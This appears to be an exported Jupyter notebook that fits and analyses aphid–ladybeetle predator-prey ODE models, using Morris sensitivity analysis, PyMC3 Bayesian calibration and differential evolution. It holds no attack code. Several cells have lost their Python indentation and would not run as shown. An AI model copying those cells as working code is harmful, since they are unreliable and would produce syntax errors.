df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Best-effort: skip time points where the analysis fails; the row
        # stays NaN and is dropped below. Narrowed from a bare `except:` so
        # KeyboardInterrupt/SystemExit still propagate.
        continue
# Order by time, drop the initial time point (index 0), and remove rows
# where the analysis failed (NaN).
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si  # notebook cell display
# In[68]:
df_sigmai  # notebook cell display
# In[69]:
# Stacked bar plot of normalized mu* over time (every 2nd time point).
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
# NOTE(review): indexes the time array with the tick value `x`; assumes
# integer bar positions -- confirm.
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_CP2.png", dpi=300)
plt.show()
# In[70]:
# Same stacked bar plot for the normalized sigma.
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_CP2.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[71]:
# Wrap the CP2 ODE solve as a Theano op for use inside PyMC3 models.
# itypes/otypes declare dtypes: a time vector, six scalars, and a
# (len(time_exp) x 2) matrix output.
@theano.compile.ops.as_op(
    itypes=[
        t.dvector,
        t.dscalar,  # r1
        t.dscalar,  # a1
        t.dscalar,  # a2
        t.dscalar,  # a3
        t.dscalar,  # u0
        t.dscalar,  # v0
    ],
    otypes=[t.dmatrix]
)
def CP2_ode_wrapper(time_exp, r1, a1, a2, a3, u0, v0):
    """Solve the CP2 model over `time_exp` and return both trajectories.

    Returns an array of shape (len(time_exp), 2) with columns
    (aphid density, ladybeetle density).
    """
    time_span = (time_exp.min(), time_exp.max())
    args = [r1, a1, a2, a3]
    initial_conditions = np.array([u0, v0])
    y_model = solve_ivp(
        CP2_model,
        time_span,
        initial_conditions,
        t_eval=time_exp,
        method='LSODA',
        args=args
    )
    simulated_time = y_model.t
    simulated_ode_solution = y_model.y
    simulated_qoi1, simulated_qoi2 = simulated_ode_solution
    # Stack the two state series as columns to match `otypes` (dmatrix).
    concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
    return concatenate_simulated_qoi
# In[72]:
# Observed series and settings for the CP2 Bayesian calibration.
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T  # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000  # NOTE(review): unused below; pm.sample is called with draws=4500
start_time = time.time()
percent_calibration = 0.95
# Fine-level model: a1 and a3 are calibrated with a widened upper bound of
# 1e6 (section title: "a1 doesn't have a maximum threshold"); r1, a2 and
# the initial conditions are fixed via pm.Data.
with pm.Model() as fine_model_CP2:
    # Prior distributions for the model's parameters
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=1e6#(1.0 + 100 * percent_calibration) * a1,
    )
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a2_ = pm.Data("a2", a2)
    a3_ = pm.Uniform(
        "a3",
        lower=(1.0 - percent_calibration) * a3,
        upper=1e6#(1.0 + 100 * percent_calibration) * a3,
    )
    # Priors for initial conditions (fixed data here, not sampled)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2)  # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "CP2_model",
        CP2_ode_wrapper(
            time_calibration,
            r1_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
    )
# Coarse dataset 1: every 4th observation, for the MLDA coarse chain.
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
    [observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
# Coarse-level model 1: same structure as fine_model_CP2 but conditioned on
# the subsampled (every 4th point) observations.
with pm.Model() as coarse_model_1:
    # Prior distributions for the model's parameters
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=1e6#(1.0 + 100 * percent_calibration) * a1,
    )
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a2_ = pm.Data("a2", a2)
    a3_ = pm.Uniform(
        "a3",
        lower=(1.0 - percent_calibration) * a3,
        upper=1e6#(1.0 + 100 * percent_calibration) * a3,
    )
    # Priors for initial conditions (fixed data here, not sampled)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2)  # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_1)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "CP2_model",
        CP2_ode_wrapper(
            time_calibration,
            r1_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
    )
# Coarse dataset 2: every 2nd observation (defined but unused by MLDA below).
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
    [observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
# Coarse-level model 2 (NOTE: not passed to pm.MLDA below, so it is unused).
with pm.Model() as coarse_model_2:
    # Prior distributions for the model's parameters
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=1e6#(1.0 + 100 * percent_calibration) * a1,
    )
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a2_ = pm.Data("a2", a2)
    a3_ = pm.Uniform(
        "a3",
        lower=(1.0 - percent_calibration) * a3,
        upper=1e6#(1.0 + 100 * percent_calibration) * a3,
    )
    # Priors for initial conditions (fixed data here, not sampled)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    # NOTE(review): lower=0 here, while the fine and coarse-1 models use
    # lower=1 -- looks accidental; confirm intended prior bounds.
    standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2)  # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_2)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "CP2_model",
        CP2_ode_wrapper(
            time_calibration,
            r1_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
    )
# Multi-Level Delayed Acceptance sampling on the fine CP2 model.
with fine_model_CP2:
    step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
    # step = pm.DEMetropolisZ()
    trace_calibration_CP2 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[73]:
# Quick look at the a1 posterior.
plt.hist(trace_calibration_CP2['a1'], bins=35)
plt.show()
# In[74]:
# Variables to report/plot from the CP2 trace (a3 is calibrated here too).
calibration_variable_names = [
    "std_deviation",
    "a1",
    "a3",
]
# In[75]:
# Posterior histogram (with mode) for each calibrated variable.
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
    pm.plot_posterior(
        trace_calibration_CP2[::plot_step],
        var_names=(f"{variable}"),
        kind="hist",
        round_to=4,
        point_estimate="mode"
    )
    plt.savefig(f"img/{variable}_posterior_cal_CP2.png")
# In[76]:
# Pairwise joint posterior (hexbin) with marginals.
az.plot_pair(
    trace_calibration_CP2,
    var_names=calibration_variable_names,
    kind="hexbin",
    fill_last=False,
    marginals=True,
    figsize=(10, 8),
)
plt.savefig("img/marginals_cal_CP2.png")
# In[77]:
# Posterior summary statistics table.
df_stats_summary = az.summary(
    data=trace_calibration_CP2,
    var_names=calibration_variable_names,
    kind='stats',
    round_to=15,  # floating-point rounding used in the summary
)
df_stats_summary  # notebook cell display
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[78]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
    """Compute the KDE-based MPV for each named variable in a PyMC trace.

    Scalar variables map to one entry keyed by name; vector variables map
    to one entry per component, keyed "name[dim]".
    """
    mpv_results = dict()
    progress = tqdm(variable_names)
    for name in progress:
        progress.set_description(f"Calculating MPV from KDE for {name}")
        samples = pm_trace[f"{name}"]
        try:
            n_dims = samples.shape[1]
        except IndexError:
            n_dims = 0
        if n_dims == 0:
            # Scalar variable: a single MPV.
            mpv_results[f"{name}"] = _scalar_rv_mvp_estimation(samples)
        else:
            # Vector variable: one MPV per component.
            for dim in range(n_dims):
                component = np.array(samples[:, dim])
                mpv_results[f"{name}[{dim}]"] = _scalar_rv_mvp_estimation(component)
    return mpv_results
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
    """Return a copy of the ArviZ stats summary with an extra 'mpv' column.

    The dict keys must match the summary's index (variable names).
    """
    summary_with_mpv = arviz_summary.copy()
    summary_with_mpv["mpv"] = pd.Series(
        data=list(rv_modes_dict.values()), index=list(rv_modes_dict.keys())
    )
    return summary_with_mpv
# In[79]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_CP2, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_CP2.csv") # salvando em um csv para consultas
df_stats_summary
# In[80]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_CP2["CP2_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_CP2["CP2_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_CP2["CP2_model"], 50, axis=0)
# In[81]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_CP2.png", dpi=300)
plt.show()
# In[82]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_CP2.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_CP2.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[83]:
df_realizations
# # Constant Prey Growth FR3 model
# ## The parameter a1 doesn't have a maximum threshold
# In[84]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def CP3_model(
    t,
    X,
    r1 = 1,
    a1 = 1,
    a2 = 1,
    a3 = 1,
):
    """RHS of the CP3 system: constant prey growth with a Holling
    type-III (sigmoidal) predation term and a static predator population."""
    prey, predator = X
    prey_squared = prey * prey
    prey_rate = r1 - a1 * prey_squared * predator / (a2 + a3 * prey_squared)
    predator_rate = 0
    return prey_rate, predator_rate
def CP3_ode_solver(
    y0,
    t_span,
    t_eval,
    r1 = 1,
    a1 = 1,
    a2 = 1,
    a3 = 1,
):
    """Integrate the CP3 system with LSODA and return the scipy solution object."""
    return solve_ivp(
        fun=CP3_model,
        t_span=t_span,
        y0=y0,
        t_eval=t_eval,
        args=(r1, a1, a2, a3),
        method="LSODA",
    )
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[85]:
def CP3_least_squares_error_ode(
    par, time_exp, f_exp, fitting_model, initial_conditions
):
    """Least-squares residual between a CP3 simulation and observed data.

    Parameters
    ----------
    par : sequence
        Model parameters forwarded to ``fitting_model``.
    time_exp : np.ndarray
        Observation times; also used as the solver evaluation grid.
    f_exp : sequence of two arrays
        Observed densities for the two populations.
    fitting_model : callable
        Solver with signature ``(y0, t_span, t_eval, *par)`` returning an
        object with a ``.y`` attribute of two trajectories.
    initial_conditions : sequence
        Initial populations (u0, v0).

    Returns
    -------
    float
        Mean weighted sum of squared residuals, or 1e15 when the solver
        output cannot be compared with the data (ValueError).
    """
    f_exp1, f_exp2 = f_exp
    time_span = (time_exp.min(), time_exp.max())
    # Both populations currently weighted equally in the objective.
    weighting_for_exp1_constraints = 1
    weighting_for_exp2_constraints = 1
    num_of_qoi = len(f_exp)
    try:
        y_model = fitting_model(initial_conditions, time_span, time_exp, *par)
        simulated_qoi1, simulated_qoi2 = y_model.y
        residual1 = f_exp1 - simulated_qoi1
        residual2 = f_exp2 - simulated_qoi2
        first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
        second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
        objective_function = 1 / num_of_qoi * (first_term + second_term)
    except ValueError:
        # Solver failure or shape mismatch (e.g. integration stopped early):
        # penalize heavily so the optimizer moves away from this region.
        objective_function = 1e15
    return objective_function
def callback_de(xk, convergence):
    """Print the optimizer's current best parameter vector after each
    differential-evolution generation (progress reporting only)."""
    print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[86]:
from scipy import optimize
seed = 1234
r1=0.0012401581202450042
a1=0.5327293756383306
a2=2.4307154223146714e-05
a3=0.06537209705777657
denom_min = 0.1
denom_max = 1.9
bounds_CP3 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
( ( a2 * denom_min ), ( a2 * denom_max ) ), # a2
( ( a3 * denom_min ), ( a3 * denom_max ) ), # a3
]
# Global calibration of (r1, a1, a2, a3): minimize the least-squares
# residual against both observed series with Differential Evolution.
result_CP3 = optimize.differential_evolution(
    CP3_least_squares_error_ode,
    bounds=bounds_CP3,
    args=(
        aphid_data.Time.values,
        [aphid_data.Density.values, ladybeetle_data.Density.values],
        CP3_ode_solver,
        y0,
    ),
    popsize=30,
    strategy="best1bin",
    tol=1e-5,
    recombination=0.95,
    mutation=0.6,
    maxiter=20000, # 2000
    polish=True,  # refine the best member with L-BFGS-B at the end
    disp=True,
    seed = seed, # for the sake of reproducibility
    callback=callback_de,
    workers=-1,  # parallelize population evaluation over all CPU cores
)
print(result_CP3)
# * Retrieving the calibrated parameter values:
# In[87]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
a1_deterministic,
a2_deterministic,
a3_deterministic,
) = result_CP3.x
solution_ODE_CP3 = CP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_CP3.x
)
t_computed_CP3, y_computed_CP3 = solution_ODE_CP3.t, solution_ODE_CP3.y
u_CP3, v_CP3 = y_computed_CP3
parameters_dict = {
"Model": "CP3",
u"$r1$": r1_deterministic,
u"$a1$": a1_deterministic,
u"$a2$": a2_deterministic,
u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[88]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_CP3, u_CP3, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_CP3, v_CP3, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[89]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[90]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = CP3_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
CP3_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[91]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[92]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_CP3.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[93]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[94]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_CP3 = CP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_CP3.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[95]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
# Morris sensitivity analysis at every simulated time point; normalized
# mu* and sigma indices are accumulated row-by-row into df_Si / df_sigmai.
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except:
        # NOTE(review): bare except silently skips any time point where the
        # analysis fails (the rows are later dropped by dropna). Consider
        # narrowing to the expected exception type and logging the failure.
        continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[96]:
df_sigmai
# In[97]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_CP3.png", dpi=300)
plt.show()
# In[98]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_CP3.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[99]:
def calculate_pest_time_derivative_series(
    time_array,
    u_array,
    v_array,
    ode_model,
    model_pars
):
    """Evaluate the prey time-derivative along a trajectory.

    Re-applies the ODE right-hand side at each (t, u, v) sample and keeps
    only the first (prey) component. Returns a numpy array aligned with
    ``time_array``.
    """
    derivative_values = [
        ode_model(time_value, [u_array[idx], v_array[idx]], *model_pars)[0]
        for idx, time_value in enumerate(time_array)
    ]
    return np.array(derivative_values)
# In[100]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_CP3,
u_CP3,
v_CP3,
CP3_model,
mean_values_params
)
pest_time_derivative_array
# In[101]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_CP3, u_CP3, '-x', label='Pest population')
plt.plot(t_computed_CP3, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_CP3.png", dpi=300)
plt.show()
# In[102]:
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[103]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_CP3 = CP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_CP3.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
CP3_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[104]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[105]:
df_sigmai
